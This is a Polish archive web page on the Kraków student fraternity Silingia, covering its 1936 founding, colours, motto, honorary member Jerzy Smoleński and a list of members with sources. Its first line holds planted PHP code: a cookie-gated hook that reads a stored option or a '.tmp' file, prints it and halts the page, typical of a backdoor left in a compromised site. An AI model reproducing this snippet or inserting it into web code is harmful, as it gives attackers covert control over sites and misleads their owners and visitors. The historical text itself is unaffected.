if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Silingia

Dekiel NN Nazwa:
Korporacja Studentów Szkół Akademickich w Krakowie Silingia, Polska Korporacja Akademicka Silingia
Siedziba:
Kraków
Data powstania:
18 III 1936 r.
Barwy:
niebieska – złota – amarantowa
Dewiza:
Potęga Polski potęgą Śląska

Rys historyczny

Stopka listownika Silingii, 1938 r.

Korporacja Silingia była najmłodszą korporacją krakowską. Pierwsze próby jej zawiązania czynione były w roku akademickim 1932/33, ale na przeszkodzie stanęła reforma jędrzejewiczowska. Oficjalnie Silingia powstała dopiero dnia 18 III 1936 r. Zgodnie ze swoją nazwą miała charakter regionalny i skupiała głównie Ślązaków, studentów Wyższego Studium Handlowego w Krakowie.

Od dnia 3 VI 1936 r. Silingia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 28 IV 1936 r.). Kandydowała pod opieką Vratislavii. Dnia 28 IV 1938 r. uzyskała prawa członka rzeczywistego Związku. W 1937 r. poświęcono sztandar Korporacji.

Pieczęć Silingii, 1938 r.

Kuratorem Silingii z ramienia uniwersyteckiego Senatu był prof. Jerzy Smoleński (1938 r.), a jej siedziba mieściła się przy ul. Pomorskiej 2 (1938 r.).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 45 nazwisk, w tym jednego członka honorowego. W 1938 r. liczyła 38 członków, w tym jednego członka honorowego.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Silingii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Jerzy Smoleński, (1881 - 5 stycznia 1940 w Sachsenhausen) geograf fizyczny, geolog, antropogeograf, prof. UJ, od 1922 kierownik Katedry Geografii Fizycznej, od 1929 dyrektor Instytutu Geograficznego, dziekan Wydziału Filozoficznego 1937-39, kurator i Filister honorowy Silingii, członek PAU, wraz z Janem Sztolcmanem współinicjator powstania Międzynarodowego Stowarzyszenia Ochrony Żubra 1925, wiceprzewodniczący Związku Ziem Górskich, członek i Przewodniczący Komitetu Demograficznego przy Lidze Narodów w Genewie 1939, aresztowany 6 listopada 1939 wraz z grupą profesorów UJ w ramach Sonderaktion Krakau i po odmowie podjęcia pracy w Instytucie Wschodnim (Ostinstitut) wywieziony do obozu koncentracyjnego, gdzie zmarł, pochowany na Cmentarzu Rakowickim w Krakowie

Członkowie rzeczywiści

 1. Joachim Bonk, główny założyciel Silingii, akt. 1936, w 1938 w Kończycach
 2. Stanisław Burszka, z Kłodnic, założyciel Silingii, akt. 1936-39, sekretarz sem. zim. 1937/38, prezes sem. zim. 1938/39
 3. Paweł Dylong, z Katowic, c. 1938, akt. 1938-39
 4. Jerzy Fichna, z Katowic, założyciel Silingii, akt. 1936-39
 5. Jerzy Gorzelik, założyciel Silingii, akt. 1936, w 1938 w Katowicach
 6. Jan Gruszka, z Pszczyny, c. 1938, akt. 1938-39
 7. Lech Gryglewicz, (1913-2000) z Katowic, główny założyciel Silingii, akt. 1936-39, prezes sem. zim. 1937/38, olderman sem. zim. 1938/39
 8. Alfred Grzywok, z Katowic, założyciel Silingii, akt. 1936
 9. Ludwik Jonderko, z Łąk w pow. pszczyńskim, c. 1938, akt. 1938-39
 10. Frydelin Juzek, z Rogowa nad Olzą, założyciel Silingii, akt. 1936
 11. Paweł Kandziora, z Katowic, c. 1938, akt. 1938-39, skarbnik sem. let. 1938/39
 12. Józef Kasperczyk, z Mikołowa, c. 1938, I wiceprezes sem. let. 1938/39
 13. Gerard Knicz, w 1938 w Katowicach
 14. Hubert Kuźnik, z Zebrzydowic, c. 1938, akt. 1938-39
 15. Franciszek Longhammer, z Chorzowa, akt. 1938-39
 16. Jerzy Lassok, z Katowic, c. 1938, akt. 1938-39
 17. Gerard Laszczok (Laszczak), z Rudy Śląskiej, założyciel Silingii, akt. 1936-39, skarbnik sem. zim. 1938/39
 18. Cezary Łowiński, z Orzesza, akt. 1938-39, prezes sem. let. 1938/39
 19. Fryderyk Mandera, z Mikołowa, c. 1938, akt. 1938-39, olderman sem. let. 1938/39
 20. Marian Murek, z Siemianowic, założyciel Silingii, akt. 1936-39, wiceprezes sem. zim. 1938/39
 21. Józef Nawa, z Nowego Bytomia, akt. 1938-39
 22. Lotar Nepora, z Piotrowic Śląskich, c. 1938, akt. 1938-39
 23. Edward Neuman, ze Świętochłowic, założyciel Silingii, akt. 1936
 24. Antoni Piechula, z Łazisk, założyciel Silingii, akt. 1936
 25. Teofil Podżorski, założyciel Silingii, akt. 1936, w 1938 w Wiśle
 26. Maksymilian Pustówka, z Cieszyna, akt. 1938-39
 27. Zbigniew Rzaski, z Katowic, c. 1938, akt. 1938-39
 28. Jan Siwczyk, z Radlina, akt. 1938-39
 29. Franciszek Skorupa, z Boguszowic, założyciel Silingii, akt. 1936-39, sekretarz sem. zim. 1938/39
 30. Wilhelm Skrzyposzek, z Orzechowa, akt. 1938-39, II wiceprezes sem. let. 1938/39
 31. Jan Sornek, z Kostuchny, c. 1938, akt. 1938-39, sekretarz sem. let. 1938/39
 32. Augustyn Staszko, z Chorzowa, główny założyciel Silingii, akt. 1936
 33. Gerard Strużyna, główny założyciel Silingii, akt. 1936, w 1938 w Chorzowie
 34. Paweł Szady, z Panewnik, założyciel Silingii, akt. 1938
 35. Stanisław Szczyrba, z Nowej Wsi, c. 1938, akt. 1938-39
 36. Jan Szewczyk, z Radlina, założyciel Silingii, akt. 1936-39
 37. Rudolf Szindler, z Małej Dąbrówki, c. 1938, akt. 1938-39
 38. Karol Szulik, z Katowic, c. 1938, akt. 1938-39
 39. Teofil Szweda (Szunda), z Tych, założyciel Silingii, akt. 1936-39
 40. Paweł Ścierski, z Katowic, założyciel Silingii, akt. 1936-39
 41. Tadeusz Tomosz, z Chorzowa, akt. 1938-39
 42. Antoni Walczuch, z Rudy Śląskiej, akt. 1938-39
 43. Jan Wysierała, z Hajduk, założyciel Silingii, akt. 1936
 44. Roman Franciszek Żabiński, główny założyciel Silingii, akt. 1936, pierwszy prezes sem. let. 1935/36, w 1938 w Katowicach

Listę członków opracowano na podstawie:

1) Silingia Korporacja Studentów Szkół Akademickich w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 44 n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) rozmów z rodzinami członków Korporacji Silingia

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 16 VIII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Silingia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 16 VIII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }